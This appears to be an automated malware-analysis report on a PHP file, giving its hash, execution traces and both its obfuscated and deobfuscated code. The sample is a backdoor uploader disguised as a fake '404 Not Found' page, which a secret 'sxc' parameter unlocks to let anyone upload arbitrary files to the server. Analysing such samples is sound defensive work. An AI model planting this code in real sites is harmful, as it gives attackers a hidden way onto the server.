PHP Malware Analysis

hidden.php, o.php

md5: bf65998ea37e05f8bec9a56134e4eec5

Attributes

Encoding

Files

Input

Title


Deobfuscated PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php 
echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p> </body></html> <?php 
if (isset($_GET["sxc"])) {
    echo "\"<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>\"";
    @copy($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "<a href=" . $_FILES['f']['name'] . ">" . $_FILES['f']['name'] . "</a>";
}

Execution traces

data/traces/bf65998ea37e05f8bec9a56134e4eec5_trace-1676249715.0782.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:55:40.976037]
1	0	1	0.000144	393464
1	3	0	0.000207	396552	{main}	1		/var/www/html/uploads/o.php	0	0
1	3	1	0.000226	396552
			0.000252	314200
TRACE END   [2023-02-12 22:55:40.976175]

data/traces/bf65998ea37e05f8bec9a56134e4eec5_trace-1676254301.1791.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:12:07.076965]
1	0	1	0.000186	393528
1	3	0	0.000257	396624	{main}	1		/var/www/html/uploads/hidden.php	0	0
1	3	1	0.000281	396624
			0.000335	314240
TRACE END   [2023-02-13 00:12:07.077150]


Generated HTML code

<html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /o.php was not found on this server.</p>  </body></html>

Original PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL <?php echo $_SERVER['REQUEST_URI']; ?> was not found on this server.</p> </body></html> <?php if(isset($_GET["sxc"])){ echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=")); @copy($_FILES['f']['tmp_name'],$_FILES['f']['name']); echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>"); } ?>